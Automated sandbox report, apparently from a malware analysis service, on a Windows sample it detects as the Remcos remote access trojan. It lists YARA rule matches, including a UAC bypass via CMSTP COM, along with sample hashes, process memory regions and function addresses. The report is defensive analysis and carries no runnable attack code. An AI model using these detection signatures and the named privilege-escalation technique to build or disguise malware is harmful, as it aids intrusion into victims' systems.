              Source: Yara matchFile source: Process Memory Space: file.exe PID: 4392, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3048, type: MEMORYSTR

              E-Banking Fraud

              barindex
              Yara detected Remcos RAT
              Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.4bb8f58.3.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.4bb8f58.3.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.4afc538.2.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0.2.file.exe.4a3fb18.1.raw.unpack, type: UNPACKEDPE
              Source: Yara matchFile source: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 0000000C.00000002.2198970718.00000000016FA000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2169360554.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000007.00000002.4586156440.0000000000BA7000.00000004.00000020.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: 00000000.00000002.2169360554.0000000004735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORY
              Source: Yara matchFile source: Process Memory Space: file.exe PID: 4392, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 5952, type: MEMORYSTR
              Source: Yara matchFile source: Process Memory Space: MSBuild.exe PID: 3048, type: MEMORYSTR

              Spam, unwanted Advertisements and Ransom Demands

              barindex
              Contains functionalty to change the wallpaper
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0041BB77 SystemParametersInfoW,12_2_0041BB77

              System Summary

              barindex
              Malicious sample detected (through community Yara rule)
              Source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0.2.file.exe.4bb8f58.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.file.exe.4bb8f58.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0.2.file.exe.4bb8f58.3.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0.2.file.exe.4bb8f58.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.file.exe.4bb8f58.3.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0.2.file.exe.4afc538.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.file.exe.4afc538.2.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, type: UNPACKEDPEMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Author: unknown
              Source: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003) Author: ditekSHen
              Source: 00000000.00000002.2169360554.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: 00000000.00000002.2169360554.0000000004735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: file.exe PID: 4392, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: Process Memory Space: MSBuild.exe PID: 3048, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 Author: unknown
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_004158B9 ExitWindowsEx,LoadLibraryA,GetProcAddress,12_2_004158B9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0140D57C0_2_0140D57C
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02D50C080_2_02D50C08
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02D52D180_2_02D52D18
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02E86BE00_2_02E86BE0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02E800400_2_02E80040
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_02E800060_2_02E80006
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05467D680_2_05467D68
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_054668880_2_05466888
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_05468AD00_2_05468AD0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_054662D70_2_054662D7
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_054662D80_2_054662D8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0726C7E80_2_0726C7E8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0726A6800_2_0726A680
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0726B9680_2_0726B968
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_072620A40_2_072620A4
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0726AF300_2_0726AF30
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_072647980_2_07264798
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0726C7CE0_2_0726C7CE
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0726A66E0_2_0726A66E
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0726EEE80_2_0726EEE8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0726AEF00_2_0726AEF0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0726EED90_2_0726EED9
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0726EC490_2_0726EC49
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0726EC580_2_0726EC58
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_07269B200_2_07269B20
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0726DB210_2_0726DB21
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0726B3C80_2_0726B3C8
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0726EA400_2_0726EA40
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0726EA500_2_0726EA50
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0726D8380_2_0726D838
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_0726D8480_2_0726D848
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_074B92500_2_074B9250
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_074B41700_2_074B4170
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_074B4A710_2_074B4A71
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_074B2AD60_2_074B2AD6
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_074BE6F00_2_074BE6F0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_074B35480_2_074B3548
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_074BD5000_2_074BD500
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_074B353A0_2_074B353A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_074B34A00_2_074B34A0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_074B31400_2_074B3140
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_074B31500_2_074B3150
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_074BE1E00_2_074BE1E0
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_074B00400_2_074B0040
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_074B00060_2_074B0006
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_074B50210_2_074B5021
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_074B2E020_2_074B2E02
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_074B2E100_2_074B2E10
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_074B2B4A0_2_074B2B4A
              Source: C:\Users\user\Desktop\file.exeCode function: 0_2_074B38F80_2_074B38F8
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_015BD57C9_2_015BD57C
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_070D92609_2_070D9260
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_070D41809_2_070D4180
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_070D2B589_2_070D2B58
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_070D4A809_2_070D4A80
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_070DE6F09_2_070DE6F0
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_070DD5009_2_070DD500
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_070D353B9_2_070D353B
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_070D35489_2_070D3548
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_070D92509_2_070D9250
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_070D31409_2_070D3140
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_070D31509_2_070D3150
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_070D41709_2_070D4170
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_070DE1E09_2_070DE1E0
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_070D00069_2_070D0006
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_070D50219_2_070D5021
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_070D50309_2_070D5030
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_070D00409_2_070D0040
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_070D2FAB9_2_070D2FAB
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_070D2E039_2_070D2E03
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_070D2E109_2_070D2E10
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_070DBE289_2_070DBE28
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_070D2B4B9_2_070D2B4B
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_070D4A719_2_070D4A71
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_070D39089_2_070D3908
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_070D38F89_2_070D38F8
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_0780C7E89_2_0780C7E8
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_0780A6809_2_0780A680
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_0780B9789_2_0780B978
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_078020A49_2_078020A4
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_078047989_2_07804798
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_0780C7BB9_2_0780C7BB
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_0780AF309_2_0780AF30
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_0780AF409_2_0780AF40
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_0780EED99_2_0780EED9
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_0780EEE89_2_0780EEE8
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_0780AEF09_2_0780AEF0
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_0780A5E09_2_0780A5E0
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_0780EC4B9_2_0780EC4B
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_0780EC589_2_0780EC58
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_0780B3C89_2_0780B3C8
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_0780B3D89_2_0780B3D8
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_07809B209_2_07809B20
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_07809B309_2_07809B30
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_0780EA409_2_0780EA40
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_0780EA509_2_0780EA50
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_0780B9689_2_0780B968
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_0780D8389_2_0780D838
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_0780D8489_2_0780D848
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_078020709_2_07802070
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_0EB900409_2_0EB90040
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_0EB921409_2_0EB92140
              Source: C:\Users\user\AppData\Roaming\DcBNSgyxoJFip.exeCode function: 9_2_0EB900069_2_0EB90006
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0041D07112_2_0041D071
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_004520D212_2_004520D2
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0043D09812_2_0043D098
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0043715012_2_00437150
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_004361AA12_2_004361AA
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0042625412_2_00426254
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0043137712_2_00431377
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0041E5DF12_2_0041E5DF
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0044C73912_2_0044C739
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_004267CB12_2_004267CB
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0043C9DD12_2_0043C9DD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00432A4912_2_00432A49
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0043CC0C12_2_0043CC0C
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00434D2212_2_00434D22
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00426E7312_2_00426E73
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00440E2012_2_00440E20
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_0043CE3B12_2_0043CE3B
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00412F4512_2_00412F45
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00452F0012_2_00452F00
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: 12_2_00426FAD12_2_00426FAD
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00401F66 appears 50 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 004020E7 appears 39 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 004338A5 appears 41 times
              Source: C:\Windows\Microsoft.NET\Framework\v4.0.30319\MSBuild.exeCode function: String function: 00433FB0 appears 55 times
              Source: file.exe, 00000000.00000002.2163163869.0000000000EDE000.00000004.00000020.00020000.00000000.sdmpBinary or memory string: OriginalFilenameclr.dllT vs file.exe
              Source: file.exe, 00000000.00000002.2174232885.0000000007130000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs file.exe
              Source: file.exe, 00000000.00000002.2175370631.0000000007DA0000.00000004.08000000.00040000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs file.exe
              Source: file.exe, 00000000.00000002.2169360554.0000000003EC9000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameArthur.dll" vs file.exe
              Source: file.exe, 00000000.00000002.2169360554.0000000004735000.00000004.00000800.00020000.00000000.sdmpBinary or memory string: OriginalFilenameMontero.dll8 vs file.exe
              Source: file.exe, 00000000.00000000.2131985782.0000000000942000.00000002.00000001.01000000.00000003.sdmpBinary or memory string: OriginalFilenameozQm.exe4 vs file.exe
              Source: file.exeBinary or memory string: OriginalFilenameozQm.exe4 vs file.exe
              Source: file.exeStatic PE information: EXECUTABLE_IMAGE, 32BIT_MACHINE
              Source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 12.2.MSBuild.exe.400000.0.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0.2.file.exe.4bb8f58.3.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.file.exe.4bb8f58.3.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0.2.file.exe.4bb8f58.3.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 12.2.MSBuild.exe.400000.0.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0.2.file.exe.4bb8f58.3.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.file.exe.4bb8f58.3.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0.2.file.exe.4afc538.2.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.file.exe.4afc538.2.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, type: UNPACKEDPEMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0.2.file.exe.4a3fb18.1.raw.unpack, type: UNPACKEDPEMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: REMCOS_RAT_variants Description = Detects multiple variants of REMCOS seen in the wild. Created by modifying and combining several of Florian\'s recent REMCOS ruleset. This rule aims for broader detection than the original ruleset, which used separate rules for each variant. If you do decide to break it into individual rules, the YARA strings variable names are grouped by the REMCOS variant type., Website = https://www.deadbits.org, Date = 2019-07-18, Repo = https://github.com/deadbits/yara-rules, Author = Adam M. Swanda
              Source: 0000000C.00000002.2198356038.0000000000400000.00000040.00000400.00020000.00000000.sdmp, type: MEMORYMatched rule: INDICATOR_SUSPICIOUS_EXE_UACBypass_CMSTPCOM author = ditekSHen, description = Detects Windows exceutables bypassing UAC using CMSTP COM interfaces. MITRE (T1218.003)
              Source: 00000000.00000002.2169360554.0000000003EC9000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: 00000000.00000002.2169360554.0000000004735000.00000004.00000800.00020000.00000000.sdmp, type: MEMORYMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
              Source: Process Memory Space: file.exe PID: 4392, type: MEMORYSTRMatched rule: Windows_Trojan_Remcos_b296e965 reference_sample = 0ebeffa44bd1c3603e30688ace84ea638fbcf485ca55ddcfd6fbe90609d4f3ed, os = windows, severity = x86, creation_date = 2021-06-10, scan_context = file, memory, license = Elastic License v2, threat_name = Windows.Trojan.Remcos, fingerprint = a5267bc2dee28a3ef58beeb7e4a151699e3e561c16ce0ab9eb27de33c122664d, id = b296e965-a99e-4446-b969-ba233a2a8af4, last_modified = 2021-08-23
